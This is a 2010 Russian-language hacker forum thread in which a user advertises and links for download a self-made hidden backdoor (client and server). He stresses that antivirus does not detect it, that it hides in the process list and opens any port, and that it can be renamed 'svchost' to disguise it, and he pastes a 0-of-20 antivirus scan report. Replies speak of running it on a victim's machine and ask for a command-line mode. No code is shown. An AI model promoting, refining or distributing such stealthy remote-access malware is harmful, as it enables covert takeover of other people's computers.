Небольшой бекдор от меня..(клиент+сервер)

Discussion in 'Безопасность и Анонимность' started by [ac1D], 11 May 2010.

  1. [ac1D]

    [ac1D] Banned

    Joined:
    6 Dec 2009
    Messages:
    44
    Likes Received:
    27
    Reputations:
    0
    Недавно написал бекдор для своих целей. Решил поделить, потому что:
    [+] - Ничем не палится.
    [+] - Весит 10кб.
    [+] - Можно открыть любой порт и спрятать(будет только в процессах).
    [+] - Главный поток ничем не забит -> не тормозит.
    [+] - Можно конектиться к серверу сколько влезет, пока он есть в процессах.
    [-] - Не пишется в автозагрузку. Могу сделать, просто с мои личные, эта цель не входила.


    [​IMG]

    P.S. В качестве клиента советую юзать NetCat, свой клиент написал за 5 мин, так как не хотел изобретать велосипед))

    How2:
    Открываем nvvsvc.exe вписываем свой порт, жмем Open, затем Hide Me, и сервер остается только в процессах.
    Затем в клиенте конектимся , и отсылаем команду) И нам приходит результат ее выполнения.

    [ Download this shit ]

    Хотелось бы услышать предложения по развитию этого сервера)

    Code:
    Report date:2010-05-12 19:15:39 (GMT 1)                  File name:nvvsvc.exe                 File size:10752 bytes                 MD5 hash:e662c3ebed0894f2cd018b1e5d179c2e                 SHA1 hash:8a0a78a31aeb4c067fb44f1288fddb0c45d07511                                 Detection rate:                 0 on 20 (0%)                Status:CLEAN                                                                                                                                                               AntivirusDatabaseEngineResult                                               a-squared12/05/20105.0.0.7-Avast100331-14.8.1368-AVG271.1.1/28689.0.0.725-Avira AntiVir7.10.7.917.6.0.59-BitDefender12/05/20107.0.0.2555-ClamAV12/05/20100.96.1-Comodo34683.13.579-Dr.Web12/05/20105.0-F-PROT6201005124.5.1.85-G-Data21.1402.0.7309.847-Ikarus T312/05/20101.1.84.0-Kaspersky12/05/20109.0.0.736-McAfee31/03/20105.1.0.0-NOD3251094.0.474-Panda11/05/201010.0.3.0-Solo12/05/20109.0-2010-TrendMicro1619.120-1004-VBA3212/05/20103.12.12.2-VirusBuster
    1.5.6-Zoner12/05/20100.2-                                                                                                                                Extra information                                               File type:Executable File (EXE)Packer:Nothing foundBinder detector:Nothing foundPDF analyzer:Nothing found
    _http://scanner.novirusthanks.org/analysis/e662c3ebed0894f2cd018b1e5d179c2e/bnZ2c3ZjLmV4ZQ==/
     
    #1 [ac1D], 11 May 2010
    Last edited: 12 May 2010
    5 people like this.
  2. phpdreamer

    phpdreamer Member

    Joined:
    26 Jul 2009
    Messages:
    522
    Likes Received:
    86
    Reputations:
    19
    если не ошибаюсь, запретная тема на форуме
     
    1 person likes this.
  3. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    Ну его к вирусам отнести сложно, его можно например использовать в полне мирных целях
     
    1 person likes this.
  4. [ac1D]

    [ac1D] Banned

    Joined:
    6 Dec 2009
    Messages:
    44
    Likes Received:
    27
    Reputations:
    0
    Согласен, но с другой стороны он не пишется в автозагрузку, пользователь должен разрешить доступ к сети, ну и так далее)
     
    1 person likes this.
  5. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    мне вполне понравилось.... все просто.
     
    1 person likes this.
  6. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    Тс сидиш попивает чайок читая логи от ачатавцев :)))))))))))) шучю :)
     
    1 person likes this.
  7. ghostwizard

    ghostwizard Member

    Joined:
    4 Dec 2005
    Messages:
    127
    Likes Received:
    36
    Reputations:
    21
    Console mode есть?
     
    1 person likes this.
  8. [ac1D]

    [ac1D] Banned

    Joined:
    6 Dec 2009
    Messages:
    44
    Likes Received:
    27
    Reputations:
    0
    Adio, боже мой) ты что.. Я лучше куплю загрузок.
    ghostwizard, так там только и есть консолька :)
     
  9. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    под какой .NET ?
     
  10. [ac1D]

    [ac1D] Banned

    Joined:
    6 Dec 2009
    Messages:
    44
    Likes Received:
    27
    Reputations:
    0
    У меня framework 3.5 , на других не тестировал.
     
  11. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    у меня тоже 3.5, но выдает ошибку.... сейчас разберемся)
     
  12. [ac1D]

    [ac1D] Banned

    Joined:
    6 Dec 2009
    Messages:
    44
    Likes Received:
    27
    Reputations:
    0
    MAQUEEN, а на каком именно моменте?
    Может это мало на что повлияет, но у меня Win 7 x64.
     
  13. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    у ня XP.. переустановил NET, все норма) спс ище раз.
     
    1 person likes this.
  14. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    а на чем писал ?
     
  15. [ac1D]

    [ac1D] Banned

    Joined:
    6 Dec 2009
    Messages:
    44
    Likes Received:
    27
    Reputations:
    0
    На C#.(VC# 2008)
     
  16. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    Возьму тебя на заметку :)
     
  17. MDxaker

    MDxaker Banned

    Joined:
    17 Mar 2009
    Messages:
    56
    Likes Received:
    15
    Reputations:
    0
    чушь.... но за работу +
     
    1 person likes this.
  18. warkk

    warkk Member

    Joined:
    20 Feb 2009
    Messages:
    139
    Likes Received:
    23
    Reputations:
    0
    Лучше уже запустить на компе жертвы телнет.
     
  19. [ac1D]

    [ac1D] Banned

    Joined:
    6 Dec 2009
    Messages:
    44
    Likes Received:
    27
    Reputations:
    0
    warkk,а как ты его спрячешь? + это весит 10 кб)
    + этот можно назвать svchost и все)
     
  20. ghostwizard

    ghostwizard Member

    Joined:
    4 Dec 2005
    Messages:
    127
    Likes Received:
    36
    Reputations:
    21
    Я имел ввиду запуск твоей утилиты с консоли, без окошка с кнопочками. Типа: "bdoor.exe /hide /port 7778"